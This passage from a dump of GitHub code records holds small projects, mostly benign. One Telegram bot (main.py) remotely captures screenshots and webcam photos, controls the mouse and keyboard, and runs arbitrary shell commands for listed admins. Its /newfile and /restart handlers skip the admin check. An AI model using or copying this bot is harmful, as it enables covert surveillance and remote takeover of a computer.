","repo_name":"Stasky745/ProgrammingTraining","sub_path":"Leetcode/.history/Medium/2_addTwoNumbers_20220520183601.py","file_name":"2_addTwoNumbers_20220520183601.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10071324313","text":"from ytmusicapi import YTMusic\n\nytmusic = YTMusic('headers_auth.json')\nplaylistId = ytmusic.create_playlist(\"Yandex Music\", \"Imported from Yandex Music\")\n\nfp = open('yandexTracks.txt', 'r')\nfSkipped = open('youtubeSkippedDuringImport.txt', 'a')\n\nfor track in fp:\n print(track)\n search_results = ytmusic.search(track.strip())\n\n if ('videoId' not in search_results[0]):\n fSkipped.writelines([track.strip(), '\\n'])\n continue\n\n ytmusic.add_playlist_items(playlistId, [search_results[0]['videoId']])\n ytmusic.rate_song(search_results[0]['videoId'], 'LIKE')\n\nfp.close()\nfSkipped.close()\n","repo_name":"Lindar90/YandexToYoutubeMusicImporter","sub_path":"importToYoutubeMusic.py","file_name":"importToYoutubeMusic.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39859518128","text":"#!/usr/bin/python\n\nimport ast\n\nclass ASTPath:\n\n def __init__(self, file_path):\n self.file_path = file_path\n\n with open(file_path) as code_file:\n code_lines = code_file.readlines()\n\n code = \"\".join(code_lines)\n\n self.paths = self.get_paths(code)\n\n @staticmethod\n def get_paths(code):\n code_ast = ast.parse(code)\n \n paths = []\n ASTPath.build_paths(code_ast, paths, \"\")\n\n return paths\n\n @staticmethod\n def build_paths(node, paths, path_so_far):\n for field in ast.iter_fields(node):\n if(field[0] != 'body'):\n path_so_far += field[0]\n path_so_far += type(field[1]).__name__\n\n for child_node in ast.iter_child_nodes(node):\n ASTPath.build_paths(child_node, paths, path_so_far)\n\n if path_so_far:\n paths.append(path_so_far)\n","repo_name":"panchdevs/code-detection","sub_path":"lib/ASTPath.py","file_name":"ASTPath.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"33782197619","text":"from django.shortcuts import render\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\nfrom .models import *\nimport urllib.request\nimport sys\n\n\ndef normalize_whitespace(text):\n\tstring = \"\"\n\tresult = string.join(text)\n\treturn result\n\nclass myContentHandler(ContentHandler):\n\tdef __init__ (self):\n\t\tself.inItem = False\n\t\tself.inContent = False\n\t\tself.theContent = \"\"\n\t\tself.entidad = \"\"\n\t\tself.nombre = \"\"\n\t\tself.descripcion = \"\"\n\t\tself.accesibilidad = \"\"\n\t\tself.contenturl = \"\"\n\t\tself.first = True\n\t\tself.nombrevia = \"\"\n\t\tself.clasevial = \"\"\n\t\tself.tiponum = \"\"\n\t\tself.num = \"\"\n\t\tself.localidad = \"\"\n\t\tself.provincia = \"\"\n\t\tself.codigopostal = \"\"\n\t\tself.barrio = \"\"\n\t\tself.distrito= \"\"\n\t\tself.coordenadax = \"\"\n\t\tself.coordenaday= \"\"\n\t\tself.latitud = \"\"\n\t\tself.longitud = \"\"\n\t\tself.telefono = \"\"\n\t\tself.email = \"\"\n\t\tself.attr = \"\"\n\t\tself.url = False\n\n\tdef startElement (self, name, attrs):\n\t\tif name == 'contenido':\n\t\t\tself.inItem = True\n\t\tif self.inItem:\n\t\t\tif name == 'atributo':\n\t\t\t\tself.attr = normalize_whitespace(attrs.get('nombre'))\n\n\t\t\t\tif self.attr == \"ID-ENTIDAD\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"NOMBRE\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"DESCRIPCION\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"ACCESIBILIDAD\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"CONTENT-URL\":\n\t\t\t\t\tself.url = True\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"NOMBRE-VIA\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"CLASE-VIAL\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"TIPO-NUM\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"NUM\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"LOCALIDAD\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"PROVINCIA\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"CODIGO-POSTAL\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"BARRIO\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"DISTRITO\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"COORDENADA-X\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"COORDENADA-Y\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"DATOSCONTACTOS\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"TELEFONO\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"EMAIL\":\n\t\t\t\t\tself.inContent = True\n\n\n\tdef endElement (self, name):\n\t\tif self.inContent:\n\t\t\tself.theContent = normalize_whitespace(self.theContent)\n\n\t\tif self.attr == \"ID-ENTIDAD\":\n\t\t\tself.entidad = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"NOMBRE\":\n\t\t\tself.nombre = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"DESCRIPCION\":\n\t\t\tself.descripcion = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"ACCESIBILIDAD\":\n\t\t\tself.accesibilidad = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"CONTENT-URL\":\n\t\t\tself.contenturl = normalize_whitespace(self.theContent)\n\t\t\tself.url = False\n\t\t\tself.first = False\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"NOMBRE-VIA\":\n\t\t\tself.nombrevia = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"CLASE-VIAL\":\n\t\t\tself.clasevial = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"TIPO-NUM\":\n\t\t\tself.tiponum = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"NUM\":\n\t\t\tself.num = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"LOCALIDAD\":\n\t\t\tself.localidad = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"PROVINCIA\":\n\t\t\tself.provincia = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"CODIGO-POSTAL\":\n\t\t\tself.codigopostal = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"BARRIO\":\n\t\t\tself.barrio = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"DISTRITO\":\n\t\t\tself.distrito = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"COORDENADA-X\":\n\t\t\tself.coordenadax = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"COORDENADA-Y\":\n\t\t\tself.coordenaday = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"DATOSCONTACTOS\":\n\n\t\t\tp = Museo(entidad=self.entidad, nombre=self.nombre, descripcion=self.descripcion, accesibilidad=self.accesibilidad, content_url=self.contenturl, localizacion=self.nombrevia, clase_vial=self.clasevial, tipo_num=self.tiponum, num=self.num, localidad=self.localidad, provincia=self.provincia, codigo_postal=self.codigopostal, barrio=self.barrio, distrito=self.distrito, coordenada_x=self.coordenadax, coordenada_y=self.coordenaday, telefono=self.telefono, email=self.email)\n\t\t\tp.save()\n\n\t\tif self.attr == \"TELEFONO\":\n\t\t\tself.attr = \"DATOSCONTACTOS\"\n\t\t\tself.telefono = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"EMAIL\":\n\t\t\tself.attr = \"DATOSCONTACTOS\"\n\t\t\tself.email = self.theContent\n\t\t\tself.theContent = \"\"\n\n\tdef characters (self, chars):\n\t\tif self.inContent:\n\t\t\tif self.url:\n\t\t\t\tif self.first == True:\n\t\t\t\t\tself.theContent = self.theContent + chars\n\t\t\t\telse:\n\t\t\t\t\tself.first = True\n\t\t\t\t\tself.theContent = chars\n\t\t\telse:\n\t\t\t\tself.theContent = chars\n\n\ndef get_data():\n\ttheParser = make_parser()\n\ttheHandler = myContentHandler()\n\ttheParser.setContentHandler(theHandler)\n\n\turl = 'https://datos.madrid.es/portal/site/egob/menuitem.ac61933d6ee3c31cae77ae7784f1a5a0/?'\n\turl += 'vgnextoid=00149033f2201410VgnVCM100000171f5a0aRCRD&format=xml&file=0&filename=201132-0-'\n\turl += 'museos&mgmtid=118f2fdbecc63410VgnVCM1000000b205a0aRCRD&preview=full'\n\txmlFile = urllib.request.urlopen(url)\n\ttheParser.parse(xmlFile)\n\n\treturn(\"Parser completed\")\n","repo_name":"ElenaBenito/X-Serv-Practica-Museos","sub_path":"practica/museos/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"17510651126","text":"import random\nimport json\n\n# 產生20筆交易紀錄\ntransactions = []\nfor i in range(100000):\n # 隨機選擇兩個帳戶\n account_ids = random.sample(range(1, 100001), 2)\n from_account_id = account_ids[0]\n to_account_id = account_ids[1]\n\n # 隨機產生交易金額\n # amount = round(random.randrange(100, 1000), 2)\n amount = 100\n\n # 加入交易紀錄\n transaction = {\n \"from_account_id\": from_account_id,\n \"to_account_id\": to_account_id,\n \"amount\": amount\n }\n transactions.append(transaction)\n\n# 將交易紀錄存到JSON檔案中\nwith open('transactions.json', 'w') as f:\n json.dump(transactions, f)\n","repo_name":"Tanlikfeng/atm-transaction","sub_path":"generate_transaction.py","file_name":"generate_transaction.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39282185019","text":"import torch\nfrom torch.nn import LSTM, Conv1d\nimport torch_geometric\nfrom torch_geometric.nn import Linear, GCNConv, GatedGraphConv\nfrom torch_geometric.utils import to_dense_batch, remove_self_loops\nimport torch.nn.functional as F\nimport gin\n\n\n# H(l-1)AW\nclass LinearAggregation(torch_geometric.nn.MessagePassing):\n def __init__(self, input_channels, output_channels):\n super().__init__()\n self.lin = Linear(input_channels, output_channels).double() #H(l-1)W\n\n def forward(self,x, edge_index, edge_weight):\n x = self.lin(x)\n\n x = self.propagate(edge_index, x=x, norm=edge_weight)\n\n return x\n\n def message(self, x_j, edge_index, norm):\n return norm.view(-1,1) * x_j\n\nclass RPINetGNNLayer(torch_geometric.nn.MessagePassing):\n def __init__(self, input_channels, output_channels, filter_size, struc_op=None):\n super().__init__()\n self.lin = Linear(input_channels, output_channels)\n self.conv = Conv1d(input_channels, output_channels, filter_size, padding='same')\n self.lstm = LSTM(output_channels, output_channels, batch_first=True)\n if struc_op is None:\n self.struc_op = struc_op\n else:\n self.struc_op = struc_op(input_channels, output_channels)\n\n def forward(self, x, h0, c0, edge_index, batch, edge_weight):\n #x = [b_S, Lenghth, embed]\n #h0 = [1,b_S, embed_dim]\n #\n \n ## py_geometric databatch -> batched tensor / Adds fake nodes to keep length equal\n batched_x, mask = to_dense_batch(x, batch)\n batched_x = torch.transpose(batched_x, 1, 2)\n\n\n\n ## convolution \n conv_x = self.conv(batched_x)\n\n # AH(l-1)W -- Linear projection H(l-1)W -> Aggregated over adjacent neighbour nodes\n if self.struc_op is None:\n lin_x = self.lin(x)\n lin_x, _= to_dense_batch(self.propagate(edge_index, x=lin_x, norm=edge_weight), batch)\n\n else:\n lin_x = self.struc_op(x, edge_index, edge_weight)\n lin_x, _= to_dense_batch(lin_x, batch)\n \n # linear = aggregated(add) messages of base pairings + conv(filter size 3) = messages from backbone neighbors\n\n messages = torch.transpose(F.relu(torch.transpose(lin_x, 1, 2)+conv_x), 1,2)\n\n batched_x = torch.transpose(batched_x, 1, 2)\n\n # if l=1, set cell memory to\n if c0 is None:\n c0 = torch.zeros(1, batched_x.shape[0], messages.shape[2]).double().cuda()\n if h0 is None:\n h0 = torch.zeros(1, batched_x.shape[0], messages.shape[2]).double().cuda()\n\n \n output, (hn,cn) = self.lstm(messages, (h0, c0))\n\n\n #apply mask to 'unbatch' output tensor again [batch_size, x, y] -> [X,Y] combined graph\n return output[mask], output, cn\n\n def message(self, x_j, edge_index, norm):\n # normalize neighbor messages x_j by bpp of nodes\n return norm.view(-1,1) * x_j\n\nclass GCN_CNN_Layer(torch_geometric.nn.MessagePassing):\n def __init__(self, input_channels, output_channels, kernel_size):\n super().__init__()\n self.kernel_size = kernel_size\n\n self.bb_conv = Conv1d(input_channels, output_channels, padding='same', kernel_size=kernel_size)\n self.bp_conv = GCNConv(input_channels, output_channels)\n\n def forward(self, x, edge_index, edge_weight, batch):\n dense_batch, mask = to_dense_batch(x,batch)\n bb = self.bb_conv(torch.transpose(dense_batch, 1, 2)).transpose(1,2)[mask]\n\n bp = self.bp_conv(x, edge_index, edge_weight)\n\n out = F.relu(bb+bp)\n\n out = F.dropout(out, training=self.training)\n\n return(out)\n\n@gin.configurable \nclass Sep_Seq_Struc_Layer(torch.nn.Module):\n def __init__(self, input_channels, output_channels, seq_op, struc_op, no_input_channels=False ,**kwargs):\n super().__init__()\n self.seq_op = seq_op(input_channels, output_channels)\n if no_input_channels:\n self.struc_op = struc_op(output_channels, **kwargs)\n else:\n self.struc_op = struc_op(input_channels, output_channels)\n \n\n def forward(self, x, edge_index, edge_weight, batch):\n seq_x = self.seq_op(x, batch)\n struc_x = self.struc_op(x, edge_index, edge_weight)\n\n out = F.relu(seq_x+struc_x)\n\n return(out)\n\n@gin.configurable \nclass Sep_Seq_Struc_Layer_LSTM(torch.nn.Module):\n def __init__(self, input_channels, output_channels, seq_op, struc_op, no_input_channels=False ,**kwargs):\n super().__init__()\n self.seq_op = seq_op(input_channels, output_channels)\n \n if no_input_channels:\n self.struc_op = struc_op(output_channels)\n else:\n self.struc_op = struc_op(input_channels, output_channels)\n \n self.lstm = LSTM(output_channels, output_channels, batch_first=True)\n\n def forward(self, x, edge_index, edge_weight, batch, cell_mem):\n seq_x = self.seq_op(x, batch)\n struc_x = self.struc_op(x, edge_index, edge_weight)\n\n out = F.relu(seq_x+struc_x)\n\n out, mask = to_dense_batch(out, batch)\n\n\n if cell_mem is None:\n cell_mem = torch.zeros(1, out.shape[0], out.shape[2]).double().cuda()\n \n h0 = torch.zeros(1, out.shape[0], out.shape[2]).double().cuda()\n\n out, (hn,cn) = self.lstm(out, (h0, cell_mem))\n\n return out[mask], out, cn","repo_name":"nicolasgoedert97/RNARepLearn","sub_path":"RNARepLearn/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"25934768170","text":"import calendar\ndef season(month):\n if month in ('December', 'January', 'February'):\n return ('Winter')\n elif month in ('March', 'April', 'May'):\n return ('Spring')\n elif month in ('June', 'July', 'August'):\n return ('Summer')\n elif month in ('September', 'October', 'November'):\n return ('Fall')\n\nmonth = calendar.month_name[int(input(\"\"\"Write a number from 1 to 12 to know what season is this month, where 1 -> January and 12 -> December\\nNumber:\"\"\"))]\nprint(season(month))","repo_name":"Bolshartd/Tproger","sub_path":"season_from_month.py","file_name":"season_from_month.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32132299521","text":"from typing import Any, Dict, Mapping, Type, TypeVar, Union, cast, no_type_check\n\nfrom debian.deb822 import Deb822, RestrictedWrapper\n\nfrom debutizer.deb822_utils import Field\n\nT = TypeVar(\"T\", bound=Deb822)\nCLS = TypeVar(\"CLS\", bound=\"Deb822Schema\")\n\nSOURCE = Union[Deb822, RestrictedWrapper]\n\n\nclass Deb822Schema:\n FIELDS: Dict[str, Field]\n\n def __init__(self, deb822_type: Type[T]):\n self._deb822_type = deb822_type\n\n def serialize(self) -> T:\n deb822 = self._deb822_type()\n\n for attr_name, field in self.__class__.FIELDS.items():\n value = self.__getattribute__(attr_name)\n if value is not None:\n deb822[field.name] = field.serialize(value)\n\n return cast(T, deb822)\n\n @classmethod\n @no_type_check # mypy has issues with iterators\n def _deserialize_fields(cls, source: SOURCE) -> Dict[str, Any]:\n inputs = {}\n\n for attr_name, field in cls.FIELDS.items():\n if field.name in source:\n inputs[attr_name] = field.deserialize(source[field.name])\n else:\n inputs[attr_name] = None\n\n return inputs\n\n @classmethod\n def deserialize(cls: Type[CLS], source: SOURCE) -> CLS:\n inputs = cls._deserialize_fields(source)\n return cls(**inputs)\n","repo_name":"velovix/debutizer","sub_path":"debutizer/deb822_schema.py","file_name":"deb822_schema.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"42649540398","text":"from gtts import gTTS\nfrom playsound import playsound\nimport telebot\nimport pyautogui\nfrom PIL import Image, ImageDraw, ImageFont\nimport os\nimport codecs\nimport subprocess as sp\nimport cv2\nimport time\nfrom functools import *\nimport json\nimport sys\nhomedir = \"/home/salih/gits\"\njf = json.load(open(f'{homedir}/PyConnectTGbot/admins.json'))\ndef photocap():\n import cv2\n camera_port = 0\n camera = cv2.VideoCapture(camera_port)\n time.sleep(0.1) \n return_value, image = camera.read()\n cv2.imwrite(f\"{homedir}/PyConnectTGbot/camout.png\", image)\n del(camera)\napi_key = open(f'{homedir}/PyConnectTGbot/api','r+').read()\nbot = telebot.TeleBot(api_key)\nosmode = False\ndef is_admin(id):\n admins = jf[\"admins\"]\n return str(id) in admins\n\ndef restrict():\n def deco_restrict(f):\n @wraps(f)\n def f_restrict(message, *args, **kwargs):\n id = message.chat.id\n if is_admin(id):\n return f(message, *args, **kwargs)\n else:\n bot.send_message(chat_id=message.chat.id, text='You have no access!')\n return f_restrict \n return deco_restrict\n\n@bot.message_handler(commands=['start'])\ndef strt(message):\n bot.reply_to(message, message.chat.id)\n\n@bot.message_handler(commands=['ss','screenshot'])\n@restrict()\ndef test(message):\n if os.environ[\"XDG_SESSION_TYPE\"]==\"wayland\":\n os.system(f'grim -c -t png \"{homedir}/PyConnectTGbot/ss.png\"')\n else:\n pyautogui.screenshot(f'{homedir}/PyConnectTGbot/ss.png')\n bot.send_photo(message.chat.id, open(f'{homedir}/PyConnectTGbot/ss.png', 'rb'))\n try:\n os.remove('ss.png')\n except:\n pass\n@bot.message_handler(commands=['cam','camera'])\n@restrict()\ndef cam(message):\n photocap()\n bot.send_photo(message.chat.id, open(f'{homedir}/PyConnectTGbot/camout.png', 'rb'))\n try:\n os.remove(f'{homedir}/PyConnectTGbot/camout.png')\n except:\n pass\n@bot.message_handler(commands=['mp','mouseposition'])\n@restrict()\ndef mp(message):\n try:\n os.remove('{homedir}/PyConnectTGbot/ss.png {homedir}/PyConnectTGbot/ssout.png')\n except:\n pass\n if os.environ[\"XDG_SESSION_TYPE\"]==\"wayland\":\n os.system(f'grim -c -t png \"{homedir}/PyConnectTGbot/ss.png\"')\n else:\n pyautogui.screenshot(f'{homedir}/PyConnectTGbot/ss.png')\n ssimage = Image.open(f'{homedir}/PyConnectTGbot/ss.png')\n xpos = pyautogui.position()[0]\n ypos = pyautogui.position()[1]\n draw = ImageDraw.Draw(ssimage)\n draw.rectangle((xpos, ypos, xpos + 20, ypos + 20), fill=True, outline='green', width=1)\n ssimage.save(f'{homedir}/PyConnectTGbot/ssout.png')\n bot.send_message(text=str(pyautogui.position()),chat_id=message.chat.id)\n bot.send_photo(message.chat.id, open(f'{homedir}/PyConnectTGbot/ssout.png','rb'))\n try:\n os.remove(f'{homedir}/PyConnectTGbot/ss.png')\n os.remove(f'{homedir}/PyConnectTGbot/ssout.png')\n except:\n pass\n@bot.message_handler(commands=['newfile','nf'])\ndef newf(message):\n inp = message.text\n inplist = inp.split('\\n')\n filename = inplist[1]\n code = inp.split(inplist[1])[1]\n f = open(filename,'w+')\n f.write(code)\n\n@bot.message_handler(commands=['test','t'])\n@restrict()\ndef test(message):\n bot.send_message(chat_id=message.chat.id,text=message)\n@bot.message_handler(commands=['moveTo','moveto'])\n@restrict()\ndef ptmove(message):\n print(message.text)\n msg = message.text\n try:\n ml = msg.split(' ')\n x = int(ml[1])\n y = int(ml[2])\n pyautogui.moveTo(x,y)\n except:\n bot.send_message(text=\"usage: /moveTo x y\")\n@bot.message_handler(commands=['move','move'])\n@restrict()\ndef ptmove(message):\n print(message.text)\n msg = message.text\n try:\n ml = msg.split(' ')\n x = int(ml[1])\n y = int(ml[2])\n pyautogui.move(x,y)\n except:\n bot.send_message(text=\"usage: /move x y\")\n@bot.message_handler(commands=['type'])\n@restrict()\ndef ptwrite(message):\n inpt = str(message.text).split('/type ')[1]\n pyautogui.typewrite(inpt)\n@bot.message_handler(commands=['press'])\n@restrict()\ndef ptpress(message):\n inpt = str(message.text).split('/press ')[1]\n pyautogui.press(inpt)\n@bot.message_handler(commands=['titles'])\n@restrict()\ndef getttl(message):\n if sys.platform != \"linux\":\n bot.send_message(text=str(pyautogui.getAllTitles()),chat_id=message.chat.id)\n else: \n bot.send_message(text=sp.check_output('wmctrl -l',shell=True).decode('utf-8'),chat_id=message.chat.id)\n@bot.message_handler(commands=['click','c'])\n@restrict()\ndef ptclick(message):\n if message.text == \"/click\":\n pyautogui.click()\n else:\n tinp = message.text.split(' ')\n x = tinp[1]\n y = tinp[2]\n pyautogui.click(x,y)\n@bot.message_handler(commands=['rclick','rc'])\n@restrict()\ndef ptclick(message):\n if message.text == \"/rclick\":\n pyautogui.leftClick()\n else:\n tinp = message.text.split(' ')\n x = tinp[1]\n y = tinp[2]\n pyautogui.leftClick(x,y)\n@bot.message_handler(commands=['talk','tts'])\n@restrict()\ndef recaud(message):\n mytext = str(message.text).split(f\"{message.text.split(' ')[0]}\")[1]\n filename = f'ttss.mp3'\n language = 'en'\n myobj = gTTS(text=mytext, lang=language, slow=False)\n myobj.save(filename)\n bot.send_message(text=mytext,chat_id=message.chat.id)\n playsound(filename)\n #os.system(f'start {filename}')\n bot.send_audio(chat_id=message.chat.id, audio=open(filename, 'rb'))\n@bot.message_handler(commands=['doubleclick','dc'])\n@restrict()\ndef ptdclick(message):\n if message.text == \"/doubleclick\":\n pyautogui.doubleclick()\n else:\n tinp = message.text.split(' ')\n x = tinp[1]\n y = tinp[2]\n pyautogui.doubleClick(x,y)\n\n@bot.message_handler(commands=['restart'])\ndef restart(message):\n bot.reply_to(message,'Restarting...')\n os.execv(sys.executable, ['python'] + sys.argv)\n\n@bot.message_handler(commands=['os','cmd','shell'])\n@restrict()\ndef oscmd(message):\n bot.send_message(text=\"Shell:\",chat_id=message.chat.id)\n osmode = True\n while osmode:\n @bot.message_handler()\n @restrict()\n def oscmdmode(message):\n msg = str(message.text)\n osmode = True\n print(msg)\n if msg == \"exit\":\n osmode = False\n bot.send_message(chat_id=message.chat.id, text=\"Exiting Shell\")\n os.execv(sys.executable, ['python'] + sys.argv)\n\n if osmode:\n if not msg.startswith('/'):\n try:\n outpt = sp.check_output(msg,shell=True)\n outpt = codecs.decode(outpt, 'UTF-8')\n bot.reply_to(message=message, text=outpt)\n print(outpt)\n except UnicodeDecodeError:\n outpt = sp.check_output(msg,shell=True)\n outpt = str(outpt)\n bot.reply_to(message=message, text=outpt)\n print(outpt)\n else:\n pass \nprint('Bot Started')\nbot.polling(non_stop=True)\n","repo_name":"salihburock/PyConnectTGbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"70259491130","text":"# Recursion mini-project 2 - Factorial\n''' \nFactorial\n- The product of an integer n , and all the integers below it.\n- Factorial of 4 = 4 * 3 * 2 * 1 = 24 \n- It's denoted by the ! after the number, so 5 factorial would be written as 5!\n- Factorial 0 is 1\n- Base case: \n If ased for the factorial of 0, return 1 since 0! = 1 \n\nRecursive build\n1! = 1\n2! = 2 * 1!\n3! = 3 * 2!\n4! = 4 * 3!\n5! = 5 * 4!\n...\nn! = n * (n-1)! \nfor n > 0\n\nfactorial(1) = 1\nfactorial(2) = 2 * factorial(1)\nfactorial(3) = 3 * factorial(2)\nfactorial(4) = 4 * factorial(3)\nfactorial(5) = 5 * factorial(4) \n\n'''\n\ndef factorial_recur(n):\n if n == 0:\n return 1\n else:\n return n * factorial_recur(n-1)\n\nz = 0 # expecting 1\nprint(f\"The value of {z}! is {factorial_recur(z)}\")\nz = 1 # expecting 1\nprint(f\"The value of {z}! is {factorial_recur(z)}\")\nz = 5 # expecting 120\nprint(f\"The value of {z}! is {factorial_recur(z)}\")","repo_name":"Zioq/Algorithms-and-Data-Structures-With-Python","sub_path":"12.Merge Sort with Recursion/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6372071353","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def middleNode(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n #using the fast and slow pointer approach also\n #if we have 2 middle node,we return the 2nd middle node which is the SLOW node when fast or fast.next becomes null or none\n #https://www.youtube.com/watch?v=_cl3O4FBZh8 check that video to understand better\n slow=fast=head\n while slow and fast and fast.next:\n slow=slow.next\n fast=fast.next.next\n return slow\n ","repo_name":"Trojan9/Data_Structures_And_Algorithm","sub_path":"Middle-of-the-Linked-List.py","file_name":"Middle-of-the-Linked-List.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74155053688","text":"import pandas as pd\nimport glob\nimport numpy as np\n\n# Specify the directory where your CSV files are located\ncsv_dir = './Data/raw/'\n\n# List all CSV files in the directory\ncsv_files = glob.glob(csv_dir + '*.csv')\n\n# Initialize an empty list to store DataFrames\ndataframes = []\n\n# Loop through each CSV file, read it, and extract the first 4 columns\nfor csv_file in csv_files:\n df = pd.read_csv(csv_file, header=None)\n df = df.iloc[:, :4]\n df.columns = ['Datetime', 'mfv_gse_x', 'mfv_gse_y', 'mfv_gse_z']\n dataframes.append(df)\n# Concatenate the DataFrames into a single DataFrame\ncombined_df = pd.concat(dataframes, ignore_index=True)\n\n# Convert the 'Datetime' column to datetime format\ncombined_df['Datetime'] = pd.to_datetime(combined_df['Datetime'], format='%Y-%m-%d %H:%M:%S')\n\n# Sort the DataFrame by the 'Datetime' column\ncombined_df = combined_df.sort_values(by='Datetime')\ncombined_df = combined_df.fillna(-np.inf)\n\ncombined_df.to_csv('./Data/dscovr_raw_clean.csv')\n","repo_name":"umar-b/SPACE-APPS-CHALLENGE-2023","sub_path":"dscovr_raw_data.py","file_name":"dscovr_raw_data.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13493553141","text":"import os\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score, precision_recall_curve, auc\nfrom typing import Union\n\n\nclass Evaluator:\n \"\"\"Abstract class. Use one of the derived classes\"\"\"\n\n _probs = {}\n\n def __init__(self, network: str = None, p_values_path: str = None, self_loops: bool = False):\n self._self_loops = self_loops\n self._p_values_path = p_values_path\n self._network = network\n self._labels = None\n self._scores = None\n\n def _load_probs(self, metric):\n if metric not in self._probs:\n path = os.path.join(self._p_values_path, \"%s_%s.npy\" % (self._network, metric.lower()))\n data = np.squeeze(np.load(path))\n\n if data.ndim == 1:\n x = np.linspace(0, 1, data.shape[0])\n data = np.vstack((x, data))\n\n self._probs[metric] = data\n\n return self._probs[metric][0, :], self._probs[metric][1, :]\n\n def fit(self, labels, scores):\n if not self._self_loops:\n idx = ~np.eye(labels.shape[0], dtype=bool)\n labels = labels[idx]\n scores = scores[idx]\n\n self._labels = np.asarray(labels, dtype=np.int32).ravel()\n self._scores = np.asarray(scores, dtype=np.float64).ravel()\n\n @property\n def network(self):\n return self._network\n\n @property\n def auroc(self):\n return roc_auc_score(self._labels, self._scores)\n\n @property\n def aupr(self):\n precision, recall, _ = precision_recall_curve(self._labels, self._scores)\n return auc(recall, precision)\n\n @property\n def score(self):\n return -np.mean([np.log10(self.auroc_p_value), np.log10(self.aupr_p_value)])\n\n @property\n def score_aupr(self):\n return -np.log10(self.aupr_p_value)\n\n @property\n def auroc_p_value(self):\n if self._p_values_path is None:\n raise Exception(\"AUROC p-value cannot be computed for this network. \"\n \"This network does not have the p-value distribution.\")\n\n try:\n xs, probs = self._load_probs(\"AUROC\")\n except FileNotFoundError:\n raise Exception(\"AUROC p-value cannot be computed for this network\")\n\n return np.interp(self.auroc, xs, probs)\n\n @property\n def aupr_p_value(self):\n if self._p_values_path is None:\n raise Exception(\"AUPR p-value cannot be computed for this network. \"\n \"This network does not have the p-value distribution.\")\n\n try:\n xs, probs = self._load_probs(\"AUPR\")\n except FileNotFoundError:\n raise Exception(\"AUPR p-value cannot be computed for this network\")\n\n return np.interp(self.aupr, xs, probs)\n\n\nclass 